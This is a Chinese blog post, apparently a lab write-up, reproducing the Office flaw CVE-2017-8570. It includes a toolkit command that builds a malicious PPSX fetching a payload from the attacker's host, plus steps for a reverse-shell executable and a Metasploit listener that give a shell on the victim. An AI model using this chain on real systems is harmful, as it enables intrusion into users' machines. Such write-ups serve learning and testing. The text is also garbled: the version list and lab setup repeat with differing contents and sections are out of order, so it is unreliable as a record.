Office CVE-2017-8570 遠程代碼執行漏洞復現
阿新 • • 發佈:2018-03-30
CVE-2017-8570 Office 遠程代碼執行 最近在學習kali的相關使用,朋友說不如就復現cve-2017-8570吧,我欣然答應。
Microsoft Office 2010 Service Pack 2 (64-bit editions)
Microsoft Office 2013 RT Service Pack 1
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)
0x02復現
攻擊者
操作系統:kali2018
IP:192.168.40.22
受害者
操作系統:win7 x64(office 2007)
IP:192.168.40.159
0x00介紹
CVE-2017-8570是一個邏輯漏洞,成因是Microsoft PowerPoint執行時會初始化“script”Moniker對象,而在PowerPoint播放動畫期間會激活該對象,從而執行sct腳本(Windows Script Component)文件。攻擊者可以誘導用戶運行惡意PPT文件,便可獲取和當前登陸用戶相同的執行權限,該漏洞利用方法簡單影響範圍廣。
0X01影響版本
Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2 (32-bit editions)
Microsoft Office 2013 RT Service Pack 1
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)
0x02復現
攻擊者
操作系統:kali2018
IP:192.168.40.22
操作系統:win7 x64(office 2007)
IP:192.168.40.159
- 我們下載好利用的exp之後,解壓打開裏面的README.md。進入文件目錄輸入:cat README.md裏面詳細講了操作步驟,講真readme真的好用。如圖:註意圖中紅框中的ip地址,均為攻擊者的ip地址。
- 按照上圖步驟進行第一步:生成惡意的PPSX文件
python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.40.22/logo.doc - 第二步:生成反彈shell的exe文件,註意這裏要是是64位系統,需要在windows後面加x64
- 第三步:開啟msf的監聽
- 第四步:生成監聽來自ppsx執行反彈shell,自動開啟80端口,註意這裏的shell文件路徑要和之前生成的文件路徑一樣。不過在進行這一步之前,我先將生成的Incoice.ppsx文件移到/var/www/html下,然後開啟Apache服務,本機訪問192.168.40.22/Incoice.ppsx,將惡意文件下載下來,隨後關閉Apache服務。
此時這裏已經可以看到received request for payload from 192.168.40.159,因為我是運行惡意文件之後截的圖。 - 受害者打開ppsx文件,即可看到成功反彈shell。期間失敗過,shell反彈不了,第二天再試的時候就好了,具體原因就歸類於自己粗心吧~~~
到此為止就已經成功復現該漏洞了。細心+不放棄=成功!
Office CVE-2017-8570 遠程代碼執行漏洞復現